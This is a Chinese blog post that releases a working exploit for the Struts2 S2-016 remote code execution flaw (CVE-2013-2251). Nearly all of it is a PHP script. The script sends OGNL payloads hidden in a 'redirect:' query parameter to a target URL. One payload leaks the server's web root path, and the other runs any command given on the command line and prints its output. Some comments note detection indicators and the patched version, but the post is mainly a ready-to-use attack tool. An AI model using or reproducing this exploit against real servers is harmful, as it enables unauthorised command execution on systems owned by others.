昨天Struts漏洞大爆发,N多大站被爆出存在struts2漏洞,百度,百合,京东等也在其中,本站也第一时间发布了struts2漏洞的预警,具体文章请看
struts2最新s2-016代码执行漏洞 – CVE-2013-2251,当时小弟说了稍后公布利用EXP,现在就兑现承诺。
首先发一个GUI版的,是K8拉登哥哥写的,可以利用较老的struts2漏洞,如下图:
个人感觉拉登哥的用起来不是很方便,自己也折腾了一个,PHP版的,写的比较垃圾,代码也是参考了bstaint大牛的,当然也有部分改进的地方,比如中文代码等,为防乱用,未集成Getshell功能,可作为管理员测试网站安全性之用,勿用于非法用途。
<?php
/**
* Created BY 独自等待
* Date : 13-7-18
* Time : 上午10:42
* FileName : struts2_S2-016.php
* 欢迎访问独自等待博客www.waitalone.cn
*/
// Banner printed on every run (runtime text, left exactly as the author wrote it).
print_r('
+-----------------------------------------------------------------------+
Struts2_S2-016漏洞利用POC
Site:http://www.waitalone.cn/
Exploit BY: 独自等待
Time:2013-07-18
+-----------------------------------------------------------------------+
');
// Usage check: the script expects two CLI arguments, a target URL and a command.
if ($argc < 3) {
print_r('
+-----------------------------------------------------------------------+
Useage: php ' . $argv[0] . ' URL CMD
URL: URL with Struts2 vulnerability
CMD: The command you want to run
Example: php ' . $argv[0] . ' http://waitalone.cn/safe.action "net user"
+-----------------------------------------------------------------------+
');
exit;
}
// 7 = E_ERROR | E_WARNING | E_PARSE. E_NOTICE is not included, so the
// undefined-variable notice raised inside command() below is never shown.
error_reporting(7);
// Both values come straight from the command line, unvalidated: no scheme/host
// check on $url and no quoting rules applied to $cmd (see command() below).
$url = $argv[1];
$cmd = $argv[2];
// S2-016 (CVE-2013-2251) probe: an OGNL expression smuggled in as the NAME of a
// `redirect:` query parameter. This one only calls getRealPath("/") on the
// servlet request and prints the result into the HTTP response body.
// Detection: a query string whose parameter name begins with `redirect:` (or
// `redirectAction:`) and carries `${` / `%23` (`#`). Mitigation: the fix shipped
// as Struts 2.3.15.1, which removed handling of these prefixes.
$path = '?redirect:${%23a%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23b%3d%23a.getRealPath("/"),%23matt%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()}';
// Sends the probe and prints the raw body; `@` hides transport errors, so a
// failed request prints an empty path instead of a warning.
echo '网站路径:' . @file_get_contents($url . $path) . "\n";
/**
 * Sends the S2-016 command payload to $url and returns what the server echoed
 * back after the marker string.
 *
 * @param string $url target action URL; the payload is appended as a query string
 * @param string $cmd command line, split on single spaces into the
 *                    java.lang.ProcessBuilder argument array (no quote handling)
 * @return string text after the `<!-struts2exp->` marker, trimmed, plus "\n"
 */
function command($url, $cmd)
{
// Each space-separated token becomes one single-quoted OGNL string literal.
// $exp is never initialised before `.=`; the resulting notice is hidden by
// error_reporting(7) in the calling script.
$arr = explode(' ', $cmd);
foreach ($arr as $str) {
$exp .= '\'' . $str . '\',';
}
$exp = rtrim($exp, ',');
// OGNL inside a `redirect:` parameter name: starts a ProcessBuilder, reads at
// most 50000 chars of its stdout into a char[] (longer output is cut off) and
// prints them into the HTTP response after the literal marker `<!-struts2exp->`.
// That marker in a response body, and `redirect:` parameter names carrying
// `${` / `%23`, are the indicators a WAF or proxy log search should alert on.
$url .= '?redirect:\${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{' . $exp . '})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23matt.getWriter().println(\'<!-struts2exp->\'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}';
// `@` hides transport errors; on failure $html is false.
$html = @file_get_contents($url);
// Re-encodes the body as GBK, dropping unconvertible sequences — presumably for
// a Chinese-locale Windows console; confirm before relying on it.
$html = iconv('utf-8', 'gbk//IGNORE', $html);
// Split on the marker. If the marker is absent (unpatched check failed, request
// failed, or the target is not vulnerable) $arr[1] is undefined and the
// function returns just "\n".
$arr = explode('<!-struts2exp->', $html);
return trim($arr[1]) . "\n";
}
// Entry point: run the command payload once and print whatever text the
// server returned after the marker.
$result = command($url, $cmd);
echo $result;
?>